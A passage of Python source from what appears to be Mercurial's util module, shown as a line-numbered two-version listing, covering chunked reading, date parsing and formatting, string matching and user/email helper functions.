1787 def splitbig(chunks):
1791 for chunk in chunks:
1788 for chunk in chunks:
1792 if len(chunk) > 2**20:
1789 if len(chunk) > 2**20:
1793 pos = 0
1790 pos = 0
1794 while pos < len(chunk):
1791 while pos < len(chunk):
1795 end = pos + 2 ** 18
1792 end = pos + 2 ** 18
1796 yield chunk[pos:end]
1793 yield chunk[pos:end]
1797 pos = end
1794 pos = end
1798 else:
1795 else:
1799 yield chunk
1796 yield chunk
1800 self.iter = splitbig(in_iter)
1797 self.iter = splitbig(in_iter)
1801 self._queue = collections.deque()
1798 self._queue = collections.deque()
1802 self._chunkoffset = 0
1799 self._chunkoffset = 0
1803
1800
1804 def read(self, l=None):
1801 def read(self, l=None):
1805 """Read L bytes of data from the iterator of chunks of data.
1802 """Read L bytes of data from the iterator of chunks of data.
1806 Returns less than L bytes if the iterator runs dry.
1803 Returns less than L bytes if the iterator runs dry.
1807
1804
1808 If size parameter is omitted, read everything"""
1805 If size parameter is omitted, read everything"""
1809 if l is None:
1806 if l is None:
1810 return ''.join(self.iter)
1807 return ''.join(self.iter)
1811
1808
1812 left = l
1809 left = l
1813 buf = []
1810 buf = []
1814 queue = self._queue
1811 queue = self._queue
1815 while left > 0:
1812 while left > 0:
1816 # refill the queue
1813 # refill the queue
1817 if not queue:
1814 if not queue:
1818 target = 2**18
1815 target = 2**18
1819 for chunk in self.iter:
1816 for chunk in self.iter:
1820 queue.append(chunk)
1817 queue.append(chunk)
1821 target -= len(chunk)
1818 target -= len(chunk)
1822 if target <= 0:
1819 if target <= 0:
1823 break
1820 break
1824 if not queue:
1821 if not queue:
1825 break
1822 break
1826
1823
1827 # The easy way to do this would be to queue.popleft(), modify the
1824 # The easy way to do this would be to queue.popleft(), modify the
1828 # chunk (if necessary), then queue.appendleft(). However, for cases
1825 # chunk (if necessary), then queue.appendleft(). However, for cases
1829 # where we read partial chunk content, this incurs 2 dequeue
1826 # where we read partial chunk content, this incurs 2 dequeue
1830 # mutations and creates a new str for the remaining chunk in the
1827 # mutations and creates a new str for the remaining chunk in the
1831 # queue. Our code below avoids this overhead.
1828 # queue. Our code below avoids this overhead.
1832
1829
1833 chunk = queue[0]
1830 chunk = queue[0]
1834 chunkl = len(chunk)
1831 chunkl = len(chunk)
1835 offset = self._chunkoffset
1832 offset = self._chunkoffset
1836
1833
1837 # Use full chunk.
1834 # Use full chunk.
1838 if offset == 0 and left >= chunkl:
1835 if offset == 0 and left >= chunkl:
1839 left -= chunkl
1836 left -= chunkl
1840 queue.popleft()
1837 queue.popleft()
1841 buf.append(chunk)
1838 buf.append(chunk)
1842 # self._chunkoffset remains at 0.
1839 # self._chunkoffset remains at 0.
1843 continue
1840 continue
1844
1841
1845 chunkremaining = chunkl - offset
1842 chunkremaining = chunkl - offset
1846
1843
1847 # Use all of unconsumed part of chunk.
1844 # Use all of unconsumed part of chunk.
1848 if left >= chunkremaining:
1845 if left >= chunkremaining:
1849 left -= chunkremaining
1846 left -= chunkremaining
1850 queue.popleft()
1847 queue.popleft()
1851 # offset == 0 is enabled by block above, so this won't merely
1848 # offset == 0 is enabled by block above, so this won't merely
1852 # copy via ``chunk[0:]``.
1849 # copy via ``chunk[0:]``.
1853 buf.append(chunk[offset:])
1850 buf.append(chunk[offset:])
1854 self._chunkoffset = 0
1851 self._chunkoffset = 0
1855
1852
1856 # Partial chunk needed.
1853 # Partial chunk needed.
1857 else:
1854 else:
1858 buf.append(chunk[offset:offset + left])
1855 buf.append(chunk[offset:offset + left])
1859 self._chunkoffset += left
1856 self._chunkoffset += left
1860 left -= chunkremaining
1857 left -= chunkremaining
1861
1858
1862 return ''.join(buf)
1859 return ''.join(buf)
1863
1860
1864 def filechunkiter(f, size=131072, limit=None):
1861 def filechunkiter(f, size=131072, limit=None):
1865 """Create a generator that produces the data in the file size
1862 """Create a generator that produces the data in the file size
1866 (default 131072) bytes at a time, up to optional limit (default is
1863 (default 131072) bytes at a time, up to optional limit (default is
1867 to read all data). Chunks may be less than size bytes if the
1864 to read all data). Chunks may be less than size bytes if the
1868 chunk is the last chunk in the file, or the file is a socket or
1865 chunk is the last chunk in the file, or the file is a socket or
1869 some other type of file that sometimes reads less data than is
1866 some other type of file that sometimes reads less data than is
1870 requested."""
1867 requested."""
1871 assert size >= 0
1868 assert size >= 0
1872 assert limit is None or limit >= 0
1869 assert limit is None or limit >= 0
1873 while True:
1870 while True:
1874 if limit is None:
1871 if limit is None:
1875 nbytes = size
1872 nbytes = size
1876 else:
1873 else:
1877 nbytes = min(limit, size)
1874 nbytes = min(limit, size)
1878 s = nbytes and f.read(nbytes)
1875 s = nbytes and f.read(nbytes)
1879 if not s:
1876 if not s:
1880 break
1877 break
1881 if limit:
1878 if limit:
1882 limit -= len(s)
1879 limit -= len(s)
1883 yield s
1880 yield s
1884
1881
1885 def makedate(timestamp=None):
1882 def makedate(timestamp=None):
1886 '''Return a unix timestamp (or the current time) as a (unixtime,
1883 '''Return a unix timestamp (or the current time) as a (unixtime,
1887 offset) tuple based off the local timezone.'''
1884 offset) tuple based off the local timezone.'''
1888 if timestamp is None:
1885 if timestamp is None:
1889 timestamp = time.time()
1886 timestamp = time.time()
1890 if timestamp < 0:
1887 if timestamp < 0:
1891 hint = _("check your clock")
1888 hint = _("check your clock")
1892 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1889 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1893 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1890 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1894 datetime.datetime.fromtimestamp(timestamp))
1891 datetime.datetime.fromtimestamp(timestamp))
1895 tz = delta.days * 86400 + delta.seconds
1892 tz = delta.days * 86400 + delta.seconds
1896 return timestamp, tz
1893 return timestamp, tz
1897
1894
1898 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1895 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1899 """represent a (unixtime, offset) tuple as a localized time.
1896 """represent a (unixtime, offset) tuple as a localized time.
1900 unixtime is seconds since the epoch, and offset is the time zone's
1897 unixtime is seconds since the epoch, and offset is the time zone's
1901 number of seconds away from UTC.
1898 number of seconds away from UTC.
1902
1899
1903 >>> datestr((0, 0))
1900 >>> datestr((0, 0))
1904 'Thu Jan 01 00:00:00 1970 +0000'
1901 'Thu Jan 01 00:00:00 1970 +0000'
1905 >>> datestr((42, 0))
1902 >>> datestr((42, 0))
1906 'Thu Jan 01 00:00:42 1970 +0000'
1903 'Thu Jan 01 00:00:42 1970 +0000'
1907 >>> datestr((-42, 0))
1904 >>> datestr((-42, 0))
1908 'Wed Dec 31 23:59:18 1969 +0000'
1905 'Wed Dec 31 23:59:18 1969 +0000'
1909 >>> datestr((0x7fffffff, 0))
1906 >>> datestr((0x7fffffff, 0))
1910 'Tue Jan 19 03:14:07 2038 +0000'
1907 'Tue Jan 19 03:14:07 2038 +0000'
1911 >>> datestr((-0x80000000, 0))
1908 >>> datestr((-0x80000000, 0))
1912 'Fri Dec 13 20:45:52 1901 +0000'
1909 'Fri Dec 13 20:45:52 1901 +0000'
1913 """
1910 """
1914 t, tz = date or makedate()
1911 t, tz = date or makedate()
1915 if "%1" in format or "%2" in format or "%z" in format:
1912 if "%1" in format or "%2" in format or "%z" in format:
1916 sign = (tz > 0) and "-" or "+"
1913 sign = (tz > 0) and "-" or "+"
1917 minutes = abs(tz) // 60
1914 minutes = abs(tz) // 60
1918 q, r = divmod(minutes, 60)
1915 q, r = divmod(minutes, 60)
1919 format = format.replace("%z", "%1%2")
1916 format = format.replace("%z", "%1%2")
1920 format = format.replace("%1", "%c%02d" % (sign, q))
1917 format = format.replace("%1", "%c%02d" % (sign, q))
1921 format = format.replace("%2", "%02d" % r)
1918 format = format.replace("%2", "%02d" % r)
1922 d = t - tz
1919 d = t - tz
1923 if d > 0x7fffffff:
1920 if d > 0x7fffffff:
1924 d = 0x7fffffff
1921 d = 0x7fffffff
1925 elif d < -0x80000000:
1922 elif d < -0x80000000:
1926 d = -0x80000000
1923 d = -0x80000000
1927 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1924 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1928 # because they use the gmtime() system call which is buggy on Windows
1925 # because they use the gmtime() system call which is buggy on Windows
1929 # for negative values.
1926 # for negative values.
1930 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1927 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1931 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1928 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1932 return s
1929 return s
1933
1930
1934 def shortdate(date=None):
1931 def shortdate(date=None):
1935 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1932 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1936 return datestr(date, format='%Y-%m-%d')
1933 return datestr(date, format='%Y-%m-%d')
1937
1934
1938 def parsetimezone(s):
1935 def parsetimezone(s):
1939 """find a trailing timezone, if any, in string, and return a
1936 """find a trailing timezone, if any, in string, and return a
1940 (offset, remainder) pair"""
1937 (offset, remainder) pair"""
1941
1938
1942 if s.endswith("GMT") or s.endswith("UTC"):
1939 if s.endswith("GMT") or s.endswith("UTC"):
1943 return 0, s[:-3].rstrip()
1940 return 0, s[:-3].rstrip()
1944
1941
1945 # Unix-style timezones [+-]hhmm
1942 # Unix-style timezones [+-]hhmm
1946 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1943 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1947 sign = (s[-5] == "+") and 1 or -1
1944 sign = (s[-5] == "+") and 1 or -1
1948 hours = int(s[-4:-2])
1945 hours = int(s[-4:-2])
1949 minutes = int(s[-2:])
1946 minutes = int(s[-2:])
1950 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1947 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1951
1948
1952 # ISO8601 trailing Z
1949 # ISO8601 trailing Z
1953 if s.endswith("Z") and s[-2:-1].isdigit():
1950 if s.endswith("Z") and s[-2:-1].isdigit():
1954 return 0, s[:-1]
1951 return 0, s[:-1]
1955
1952
1956 # ISO8601-style [+-]hh:mm
1953 # ISO8601-style [+-]hh:mm
1957 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1954 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1958 s[-5:-3].isdigit() and s[-2:].isdigit()):
1955 s[-5:-3].isdigit() and s[-2:].isdigit()):
1959 sign = (s[-6] == "+") and 1 or -1
1956 sign = (s[-6] == "+") and 1 or -1
1960 hours = int(s[-5:-3])
1957 hours = int(s[-5:-3])
1961 minutes = int(s[-2:])
1958 minutes = int(s[-2:])
1962 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1959 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1963
1960
1964 return None, s
1961 return None, s
1965
1962
1966 def strdate(string, format, defaults=None):
1963 def strdate(string, format, defaults=None):
1967 """parse a localized time string and return a (unixtime, offset) tuple.
1964 """parse a localized time string and return a (unixtime, offset) tuple.
1968 if the string cannot be parsed, ValueError is raised."""
1965 if the string cannot be parsed, ValueError is raised."""
1969 if defaults is None:
1966 if defaults is None:
1970 defaults = {}
1967 defaults = {}
1971
1968
1972 # NOTE: unixtime = localunixtime + offset
1969 # NOTE: unixtime = localunixtime + offset
1973 offset, date = parsetimezone(string)
1970 offset, date = parsetimezone(string)
1974
1971
1975 # add missing elements from defaults
1972 # add missing elements from defaults
1976 usenow = False # default to using biased defaults
1973 usenow = False # default to using biased defaults
1977 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1974 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1978 part = pycompat.bytestr(part)
1975 part = pycompat.bytestr(part)
1979 found = [True for p in part if ("%"+p) in format]
1976 found = [True for p in part if ("%"+p) in format]
1980 if not found:
1977 if not found:
1981 date += "@" + defaults[part][usenow]
1978 date += "@" + defaults[part][usenow]
1982 format += "@%" + part[0]
1979 format += "@%" + part[0]
1983 else:
1980 else:
1984 # We've found a specific time element, less specific time
1981 # We've found a specific time element, less specific time
1985 # elements are relative to today
1982 # elements are relative to today
1986 usenow = True
1983 usenow = True
1987
1984
1988 timetuple = time.strptime(encoding.strfromlocal(date),
1985 timetuple = time.strptime(encoding.strfromlocal(date),
1989 encoding.strfromlocal(format))
1986 encoding.strfromlocal(format))
1990 localunixtime = int(calendar.timegm(timetuple))
1987 localunixtime = int(calendar.timegm(timetuple))
1991 if offset is None:
1988 if offset is None:
1992 # local timezone
1989 # local timezone
1993 unixtime = int(time.mktime(timetuple))
1990 unixtime = int(time.mktime(timetuple))
1994 offset = unixtime - localunixtime
1991 offset = unixtime - localunixtime
1995 else:
1992 else:
1996 unixtime = localunixtime + offset
1993 unixtime = localunixtime + offset
1997 return unixtime, offset
1994 return unixtime, offset
1998
1995
1999 def parsedate(date, formats=None, bias=None):
1996 def parsedate(date, formats=None, bias=None):
2000 """parse a localized date/time and return a (unixtime, offset) tuple.
1997 """parse a localized date/time and return a (unixtime, offset) tuple.
2001
1998
2002 The date may be a "unixtime offset" string or in one of the specified
1999 The date may be a "unixtime offset" string or in one of the specified
2003 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2000 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2004
2001
2005 >>> parsedate(' today ') == parsedate(\
2002 >>> parsedate(' today ') == parsedate(\
2006 datetime.date.today().strftime('%b %d'))
2003 datetime.date.today().strftime('%b %d'))
2007 True
2004 True
2008 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2005 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2009 datetime.timedelta(days=1)\
2006 datetime.timedelta(days=1)\
2010 ).strftime('%b %d'))
2007 ).strftime('%b %d'))
2011 True
2008 True
2012 >>> now, tz = makedate()
2009 >>> now, tz = makedate()
2013 >>> strnow, strtz = parsedate('now')
2010 >>> strnow, strtz = parsedate('now')
2014 >>> (strnow - now) < 1
2011 >>> (strnow - now) < 1
2015 True
2012 True
2016 >>> tz == strtz
2013 >>> tz == strtz
2017 True
2014 True
2018 """
2015 """
2019 if bias is None:
2016 if bias is None:
2020 bias = {}
2017 bias = {}
2021 if not date:
2018 if not date:
2022 return 0, 0
2019 return 0, 0
2023 if isinstance(date, tuple) and len(date) == 2:
2020 if isinstance(date, tuple) and len(date) == 2:
2024 return date
2021 return date
2025 if not formats:
2022 if not formats:
2026 formats = defaultdateformats
2023 formats = defaultdateformats
2027 date = date.strip()
2024 date = date.strip()
2028
2025
2029 if date == 'now' or date == _('now'):
2026 if date == 'now' or date == _('now'):
2030 return makedate()
2027 return makedate()
2031 if date == 'today' or date == _('today'):
2028 if date == 'today' or date == _('today'):
2032 date = datetime.date.today().strftime('%b %d')
2029 date = datetime.date.today().strftime('%b %d')
2033 elif date == 'yesterday' or date == _('yesterday'):
2030 elif date == 'yesterday' or date == _('yesterday'):
2034 date = (datetime.date.today() -
2031 date = (datetime.date.today() -
2035 datetime.timedelta(days=1)).strftime('%b %d')
2032 datetime.timedelta(days=1)).strftime('%b %d')
2036
2033
2037 try:
2034 try:
2038 when, offset = map(int, date.split(' '))
2035 when, offset = map(int, date.split(' '))
2039 except ValueError:
2036 except ValueError:
2040 # fill out defaults
2037 # fill out defaults
2041 now = makedate()
2038 now = makedate()
2042 defaults = {}
2039 defaults = {}
2043 for part in ("d", "mb", "yY", "HI", "M", "S"):
2040 for part in ("d", "mb", "yY", "HI", "M", "S"):
2044 # this piece is for rounding the specific end of unknowns
2041 # this piece is for rounding the specific end of unknowns
2045 b = bias.get(part)
2042 b = bias.get(part)
2046 if b is None:
2043 if b is None:
2047 if part[0:1] in "HMS":
2044 if part[0:1] in "HMS":
2048 b = "00"
2045 b = "00"
2049 else:
2046 else:
2050 b = "0"
2047 b = "0"
2051
2048
2052 # this piece is for matching the generic end to today's date
2049 # this piece is for matching the generic end to today's date
2053 n = datestr(now, "%" + part[0:1])
2050 n = datestr(now, "%" + part[0:1])
2054
2051
2055 defaults[part] = (b, n)
2052 defaults[part] = (b, n)
2056
2053
2057 for format in formats:
2054 for format in formats:
2058 try:
2055 try:
2059 when, offset = strdate(date, format, defaults)
2056 when, offset = strdate(date, format, defaults)
2060 except (ValueError, OverflowError):
2057 except (ValueError, OverflowError):
2061 pass
2058 pass
2062 else:
2059 else:
2063 break
2060 break
2064 else:
2061 else:
2065 raise error.ParseError(_('invalid date: %r') % date)
2062 raise error.ParseError(_('invalid date: %r') % date)
2066 # validate explicit (probably user-specified) date and
2063 # validate explicit (probably user-specified) date and
2067 # time zone offset. values must fit in signed 32 bits for
2064 # time zone offset. values must fit in signed 32 bits for
2068 # current 32-bit linux runtimes. timezones go from UTC-12
2065 # current 32-bit linux runtimes. timezones go from UTC-12
2069 # to UTC+14
2066 # to UTC+14
2070 if when < -0x80000000 or when > 0x7fffffff:
2067 if when < -0x80000000 or when > 0x7fffffff:
2071 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2068 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2072 if offset < -50400 or offset > 43200:
2069 if offset < -50400 or offset > 43200:
2073 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2070 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2074 return when, offset
2071 return when, offset
2075
2072
2076 def matchdate(date):
2073 def matchdate(date):
2077 """Return a function that matches a given date match specifier
2074 """Return a function that matches a given date match specifier
2078
2075
2079 Formats include:
2076 Formats include:
2080
2077
2081 '{date}' match a given date to the accuracy provided
2078 '{date}' match a given date to the accuracy provided
2082
2079
2083 '<{date}' on or before a given date
2080 '<{date}' on or before a given date
2084
2081
2085 '>{date}' on or after a given date
2082 '>{date}' on or after a given date
2086
2083
2087 >>> p1 = parsedate("10:29:59")
2084 >>> p1 = parsedate("10:29:59")
2088 >>> p2 = parsedate("10:30:00")
2085 >>> p2 = parsedate("10:30:00")
2089 >>> p3 = parsedate("10:30:59")
2086 >>> p3 = parsedate("10:30:59")
2090 >>> p4 = parsedate("10:31:00")
2087 >>> p4 = parsedate("10:31:00")
2091 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2088 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2092 >>> f = matchdate("10:30")
2089 >>> f = matchdate("10:30")
2093 >>> f(p1[0])
2090 >>> f(p1[0])
2094 False
2091 False
2095 >>> f(p2[0])
2092 >>> f(p2[0])
2096 True
2093 True
2097 >>> f(p3[0])
2094 >>> f(p3[0])
2098 True
2095 True
2099 >>> f(p4[0])
2096 >>> f(p4[0])
2100 False
2097 False
2101 >>> f(p5[0])
2098 >>> f(p5[0])
2102 False
2099 False
2103 """
2100 """
2104
2101
2105 def lower(date):
2102 def lower(date):
2106 d = {'mb': "1", 'd': "1"}
2103 d = {'mb': "1", 'd': "1"}
2107 return parsedate(date, extendeddateformats, d)[0]
2104 return parsedate(date, extendeddateformats, d)[0]
2108
2105
2109 def upper(date):
2106 def upper(date):
2110 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2107 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2111 for days in ("31", "30", "29"):
2108 for days in ("31", "30", "29"):
2112 try:
2109 try:
2113 d["d"] = days
2110 d["d"] = days
2114 return parsedate(date, extendeddateformats, d)[0]
2111 return parsedate(date, extendeddateformats, d)[0]
2115 except Abort:
2112 except Abort:
2116 pass
2113 pass
2117 d["d"] = "28"
2114 d["d"] = "28"
2118 return parsedate(date, extendeddateformats, d)[0]
2115 return parsedate(date, extendeddateformats, d)[0]
2119
2116
2120 date = date.strip()
2117 date = date.strip()
2121
2118
2122 if not date:
2119 if not date:
2123 raise Abort(_("dates cannot consist entirely of whitespace"))
2120 raise Abort(_("dates cannot consist entirely of whitespace"))
2124 elif date[0] == "<":
2121 elif date[0] == "<":
2125 if not date[1:]:
2122 if not date[1:]:
2126 raise Abort(_("invalid day spec, use '<DATE'"))
2123 raise Abort(_("invalid day spec, use '<DATE'"))
2127 when = upper(date[1:])
2124 when = upper(date[1:])
2128 return lambda x: x <= when
2125 return lambda x: x <= when
2129 elif date[0] == ">":
2126 elif date[0] == ">":
2130 if not date[1:]:
2127 if not date[1:]:
2131 raise Abort(_("invalid day spec, use '>DATE'"))
2128 raise Abort(_("invalid day spec, use '>DATE'"))
2132 when = lower(date[1:])
2129 when = lower(date[1:])
2133 return lambda x: x >= when
2130 return lambda x: x >= when
2134 elif date[0] == "-":
2131 elif date[0] == "-":
2135 try:
2132 try:
2136 days = int(date[1:])
2133 days = int(date[1:])
2137 except ValueError:
2134 except ValueError:
2138 raise Abort(_("invalid day spec: %s") % date[1:])
2135 raise Abort(_("invalid day spec: %s") % date[1:])
2139 if days < 0:
2136 if days < 0:
2140 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2137 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2141 % date[1:])
2138 % date[1:])
2142 when = makedate()[0] - days * 3600 * 24
2139 when = makedate()[0] - days * 3600 * 24
2143 return lambda x: x >= when
2140 return lambda x: x >= when
2144 elif " to " in date:
2141 elif " to " in date:
2145 a, b = date.split(" to ")
2142 a, b = date.split(" to ")
2146 start, stop = lower(a), upper(b)
2143 start, stop = lower(a), upper(b)
2147 return lambda x: x >= start and x <= stop
2144 return lambda x: x >= start and x <= stop
2148 else:
2145 else:
2149 start, stop = lower(date), upper(date)
2146 start, stop = lower(date), upper(date)
2150 return lambda x: x >= start and x <= stop
2147 return lambda x: x >= start and x <= stop
2151
2148
2152 def stringmatcher(pattern, casesensitive=True):
2149 def stringmatcher(pattern, casesensitive=True):
2153 """
2150 """
2154 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2151 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2155 returns the matcher name, pattern, and matcher function.
2152 returns the matcher name, pattern, and matcher function.
2156 missing or unknown prefixes are treated as literal matches.
2153 missing or unknown prefixes are treated as literal matches.
2157
2154
2158 helper for tests:
2155 helper for tests:
2159 >>> def test(pattern, *tests):
2156 >>> def test(pattern, *tests):
2160 ... kind, pattern, matcher = stringmatcher(pattern)
2157 ... kind, pattern, matcher = stringmatcher(pattern)
2161 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2158 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2162 >>> def itest(pattern, *tests):
2159 >>> def itest(pattern, *tests):
2163 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2160 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2164 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2161 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2165
2162
2166 exact matching (no prefix):
2163 exact matching (no prefix):
2167 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2164 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2168 ('literal', 'abcdefg', [False, False, True])
2165 ('literal', 'abcdefg', [False, False, True])
2169
2166
2170 regex matching ('re:' prefix)
2167 regex matching ('re:' prefix)
2171 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2168 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2172 ('re', 'a.+b', [False, False, True])
2169 ('re', 'a.+b', [False, False, True])
2173
2170
2174 force exact matches ('literal:' prefix)
2171 force exact matches ('literal:' prefix)
2175 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2172 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2176 ('literal', 're:foobar', [False, True])
2173 ('literal', 're:foobar', [False, True])
2177
2174
2178 unknown prefixes are ignored and treated as literals
2175 unknown prefixes are ignored and treated as literals
2179 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2176 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2180 ('literal', 'foo:bar', [False, False, True])
2177 ('literal', 'foo:bar', [False, False, True])
2181
2178
2182 case insensitive regex matches
2179 case insensitive regex matches
2183 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2180 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2184 ('re', 'A.+b', [False, False, True])
2181 ('re', 'A.+b', [False, False, True])
2185
2182
2186 case insensitive literal matches
2183 case insensitive literal matches
2187 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2184 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2188 ('literal', 'ABCDEFG', [False, False, True])
2185 ('literal', 'ABCDEFG', [False, False, True])
2189 """
2186 """
2190 if pattern.startswith('re:'):
2187 if pattern.startswith('re:'):
2191 pattern = pattern[3:]
2188 pattern = pattern[3:]
2192 try:
2189 try:
2193 flags = 0
2190 flags = 0
2194 if not casesensitive:
2191 if not casesensitive:
2195 flags = remod.I
2192 flags = remod.I
2196 regex = remod.compile(pattern, flags)
2193 regex = remod.compile(pattern, flags)
2197 except remod.error as e:
2194 except remod.error as e:
2198 raise error.ParseError(_('invalid regular expression: %s')
2195 raise error.ParseError(_('invalid regular expression: %s')
2199 % e)
2196 % e)
2200 return 're', pattern, regex.search
2197 return 're', pattern, regex.search
2201 elif pattern.startswith('literal:'):
2198 elif pattern.startswith('literal:'):
2202 pattern = pattern[8:]
2199 pattern = pattern[8:]
2203
2200
2204 match = pattern.__eq__
2201 match = pattern.__eq__
2205
2202
2206 if not casesensitive:
2203 if not casesensitive:
2207 ipat = encoding.lower(pattern)
2204 ipat = encoding.lower(pattern)
2208 match = lambda s: ipat == encoding.lower(s)
2205 match = lambda s: ipat == encoding.lower(s)
2209 return 'literal', pattern, match
2206 return 'literal', pattern, match
2210
2207
2211 def shortuser(user):
2208 def shortuser(user):
2212 """Return a short representation of a user name or email address."""
2209 """Return a short representation of a user name or email address."""
2213 f = user.find('@')
2210 f = user.find('@')
2214 if f >= 0:
2211 if f >= 0:
2215 user = user[:f]
2212 user = user[:f]
2216 f = user.find('<')
2213 f = user.find('<')
2217 if f >= 0:
2214 if f >= 0:
2218 user = user[f + 1:]
2215 user = user[f + 1:]
2219 f = user.find(' ')
2216 f = user.find(' ')
2220 if f >= 0:
2217 if f >= 0:
2221 user = user[:f]
2218 user = user[:f]
2222 f = user.find('.')
2219 f = user.find('.')
2223 if f >= 0:
2220 if f >= 0:
2224 user = user[:f]
2221 user = user[:f]
2225 return user
2222 return user
2226
2223
2227 def emailuser(user):
2224 def emailuser(user):
2228 """Return the user portion of an email address."""
2225 """Return the user portion of an email address."""
2229 f = user.find('@')
2226 f = user.find('@')
2230 if f >= 0:
2227 if f >= 0:
2231 user = user[:f]
2228 user = user[:f]
2232 f = user.find('<')
2229 f = user.find('<')
2233 if f >= 0:
2230 if f >= 0:
2234 user = user[f + 1:]
2231 user = user[f + 1:]
2235 return user
2232 return user
2236
2233
2237 def email(author):
2234 def email(author):
2238 '''get email of author.'''
2235 '''get email of author.'''
2239 r = author.find('>')
2236 r = author.find('>')
2240 if r == -1:
2237 if r == -1:
2241 r = None
2238 r = None
2242 return author[author.find('<') + 1:r]
2239 return author[author.find('<') + 1:r]
2243
2240
2244 def ellipsis(text, maxlength=400):
2241 def ellipsis(text, maxlength=400):
2245 """Trim string to at most maxlength (default: 400) columns in display."""
2242 """Trim string to at most maxlength (default: 400) columns in display."""
2246 return encoding.trim(text, maxlength, ellipsis='...')
2243 return encoding.trim(text, maxlength, ellipsis='...')
2247
2244
2248 def unitcountfn(*unittable):
2245 def unitcountfn(*unittable):
2249 '''return a function that renders a readable count of some quantity'''
2246 '''return a function that renders a readable count of some quantity'''
2250
2247
2251 def go(count):
2248 def go(count):
2252 for multiplier, divisor, format in unittable:
2249 for multiplier, divisor, format in unittable:
2253 if abs(count) >= divisor * multiplier:
2250 if abs(count) >= divisor * multiplier:
2254 return format % (count / float(divisor))
2251 return format % (count / float(divisor))
2255 return unittable[-1][2] % count
2252 return unittable[-1][2] % count
2256
2253
2257 return go
2254 return go
2258
2255
2259 def processlinerange(fromline, toline):
2256 def processlinerange(fromline, toline):
2260 """Check that linerange <fromline>:<toline> makes sense and return a
2257 """Check that linerange <fromline>:<toline> makes sense and return a
2261 0-based range.
2258 0-based range.
2262
2259
2263 >>> processlinerange(10, 20)
2260 >>> processlinerange(10, 20)
2264 (9, 20)
2261 (9, 20)
2265 >>> processlinerange(2, 1)
2262 >>> processlinerange(2, 1)
2266 Traceback (most recent call last):
2263 Traceback (most recent call last):
2267 ...
2264 ...
2268 ParseError: line range must be positive
2265 ParseError: line range must be positive
2269 >>> processlinerange(0, 5)
2266 >>> processlinerange(0, 5)
2270 Traceback (most recent call last):
2267 Traceback (most recent call last):
2271 ...
2268 ...
2272 ParseError: fromline must be strictly positive
2269 ParseError: fromline must be strictly positive
2273 """
2270 """
2274 if toline - fromline < 0:
2271 if toline - fromline < 0:
2275 raise error.ParseError(_("line range must be positive"))
2272 raise error.ParseError(_("line range must be positive"))
2276 if fromline < 1:
2273 if fromline < 1:
2277 raise error.ParseError(_("fromline must be strictly positive"))
2274 raise error.ParseError(_("fromline must be strictly positive"))
2278 return fromline - 1, toline
2275 return fromline - 1, toline
2279
2276
2280 bytecount = unitcountfn(
2277 bytecount = unitcountfn(
2281 (100, 1 << 30, _('%.0f GB')),
2278 (100, 1 << 30, _('%.0f GB')),
2282 (10, 1 << 30, _('%.1f GB')),
2279 (10, 1 << 30, _('%.1f GB')),
2283 (1, 1 << 30, _('%.2f GB')),
2280 (1, 1 << 30, _('%.2f GB')),
2284 (100, 1 << 20, _('%.0f MB')),
2281 (100, 1 << 20, _('%.0f MB')),
2285 (10, 1 << 20, _('%.1f MB')),
